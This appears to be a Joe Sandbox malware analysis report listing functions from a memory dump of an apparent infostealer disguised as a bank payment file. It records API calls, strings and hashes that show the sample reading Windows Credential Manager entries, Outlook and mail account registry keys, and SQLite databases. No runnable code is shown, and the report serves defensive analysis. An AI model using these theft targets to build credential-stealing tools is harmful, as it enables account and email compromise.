                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                                                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                                          • API String ID: 2360744853-2229823034
                                                                                                                                                                                                                                          • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                                                                                          • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                                                                                                                                                          Function 00402C5D Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402C9D
                                                                                                                                                                                                                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                                                                                            • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                                                                                            • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                                                                                            • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                                                          • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                                                          • API String ID: 1831126014-3814494228
                                                                                                                                                                                                                                          • Opcode ID: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                                                                                                                                                                          • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8f6eaf9c13d0249a01ea98d471cb1a8874e737a8319c7d0390265d86dcdbfa3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                                                                                                                                                                                                                          Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 004100E4
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                                            • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0041014D
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410129
                                                                                                                                                                                                                                            • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                                                                                                                                            • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410171
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 00410197
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                                                          • API String ID: 912701516-1821301763
                                                                                                                                                                                                                                          • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                                                                                          • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                                                                                                                                          Function 00408F1B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                                          • API String ID: 3540791495-3849865405
                                                                                                                                                                                                                                          • Opcode ID: 3531e9c810b83e1c9a81e25a42051b0a33e7210e19b9d911fdb8999888636a2e
                                                                                                                                                                                                                                          • Instruction ID: 99806e288156f34ba132e8f36af0febe6860c11fee4b77973fd999a480d51a7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3531e9c810b83e1c9a81e25a42051b0a33e7210e19b9d911fdb8999888636a2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7631B172408385AFD720DF51D841A9BBBE9FB84314F04483FF69492292D779D944CF5A
                                                                                                                                                                                                                                          Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                                          • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                                                                                                                                                                          • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                                                                                                                                                                          • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                                                                                                                                                                          • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                                          • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                                          • API String ID: 1640410171-2022683286
                                                                                                                                                                                                                                          • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                                                                          • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                                                                                                                                                                          Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$strlen
                                                                                                                                                                                                                                          • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                                                          • API String ID: 2619041689-3408036318
                                                                                                                                                                                                                                          • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                                          • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                                                                                                                          Function 004019EA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$strlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 667451143-3916222277
                                                                                                                                                                                                                                          • Opcode ID: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                                                                          • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b31ecf1158dd6ae2a3c8c1c56445d205644741fb05b7f80747d8069a3e6348b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                                                                                                                          Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040874A
                                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040882A
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040889F
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                          • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                                          • API String ID: 3318079752-260894208
                                                                                                                                                                                                                                          • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                                                                                          • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                                                                                                                          Function 00404A99 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(comctl32.dll,76940A60,?,00000000,?,?,?,0040CF60,76940A60), ref: 00404AB8
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,76940A60), ref: 00404ADE
                                                                                                                                                                                                                                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                                                                          • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                                          • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                                                                                                                                          Function 00406C7C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00406D9B,?,?), ref: 00406CA1
                                                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00406D9B,?,?), ref: 00406CBF
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00406CCC
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,00406D9B,?,?), ref: 00406CDC
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,00406D9B,?,?), ref: 00406CE6
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,Unknown Error,?,?,00406D9B,?,?), ref: 00406CF6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                                          • API String ID: 2881943006-572158859
                                                                                                                                                                                                                                          • Opcode ID: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                                                                                                                                                                          • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7e81aadefcc7b6962b65187ced15e7eab001dc011c9c914f76b8834be414875
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                                                                                                                                          Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                                                                                                            • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                                          • API String ID: 888011440-2039793938
                                                                                                                                                                                                                                          • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                                                                                          • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                                                                          Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                                                                          • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                                                                          • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                                                                          • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                                                                          • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                                          • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                                          • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                                                                          Function 00409C1C Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A3E
                                                                                                                                                                                                                                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A4C
